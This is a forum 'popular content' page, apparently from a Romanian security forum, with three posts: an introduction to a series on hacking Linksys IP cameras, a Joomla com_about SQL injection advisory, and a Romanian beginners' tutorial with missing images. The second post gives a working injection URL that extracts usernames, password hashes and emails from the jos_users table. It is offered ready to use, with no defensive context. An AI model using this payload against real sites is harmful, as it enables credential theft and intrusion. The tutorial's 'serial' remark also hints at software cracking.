Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/11/10 in all areas

  1. I found the camera to be quite good functionalities-wise, although I’ve experienced availability problems with it. It seems the camera freezes every once in a while. Well, this is true at least when you heavily customized its configuration which is what I’ve ultimately done after playing so much with it. I’ve loved playing with embedded devices for a while, and as a security researcher I find it quite an interesting topic as many "de facto" security principles that are usually (attempted to be) followed when designing other types of systems are not often applied to embedded devices. This, I believe is due to lack of limitations in hardware resources, and lack of awareness on consequences of getting a miscellaneous device compromised. i.e.: "who cares if my IP camera gets owned?" During the next days, I’ll be posting some vulnerabilities I’ve found. Some of them are fun and serious, while others you might find kind of boring. Meet the target You can learn a lot about the specs of a device by simply reading the product’s literature. However, sometimes not enough info is provided in these documents. The following are some of the specs I confirmed by interacting with the camera in various ways: * CPU: Faraday FA526id(wb) rev 1 (v4l) according to /proc/cpuinfo * OS: Linux version 2.4.19-pl1029 according to /proc/version plus Busybox (confirmed as the file /bin/busybox exists on the filesystem) * HTTPD: thttpd 2.25b (extracted from banner returned on default html error pages and ‘Server:’ HTTP headers) * Memory:30908 kB (32 MB?) according to /proc/meminfo * Firmware Version: V1.00R22 and V1.00R24 (latest version available as on 16th April 2009) Hacking Linksys IP Cameras (pt 1) | GNUCITIZEN Hacking Linksys IP Cameras (pt 2) | GNUCITIZEN Hacking Linksys IP Cameras (pt 3) | GNUCITIZEN Hacking Linksys IP Cameras (pt 4) | GNUCITIZEN Hacking Linksys IP Cameras (pt 5) | GNUCITIZEN Hacking Linksys IP Cameras (pt 6) | GNUCITIZEN
    -1 points
  2. 75053d91412433bd2af46e8bc384850d ============================================================================== [?] Joomla com_about Remote Sql Injection Vulnerability ============================================================================== [?] Script: [Joomla] [?] Language: [ PHP ] [?] Founder: [ Snakespc Email:s-c-dz@hotmail.com - Site:sec-war.com/cc> ] [?] Greetz to:[ His0k4 sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] ########################################################################### ===[ Exploit ]=== [?] http://server/index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,group_concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users-- [?]Author: Snakespc <- ###########################################################################
    -1 points
  3. TUTORIALUL ESTE PENTRU INCEPATORI DECI NUMI SARITI IN CAP CU COMENTURI AIUREA! Programul il puteti downloada de AICI! 1. 2. 3. 4. 5. -- SERIALUL NU ARE NICI O LEGATURA CU NEMESIS! 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. Daca ati facut cum arata in poze va merge 100%! Made by Sosetutza just for rstcenter!
    -1 points
This leaderboard is set to Bucharest/GMT+03:00
×
×
  • Create New...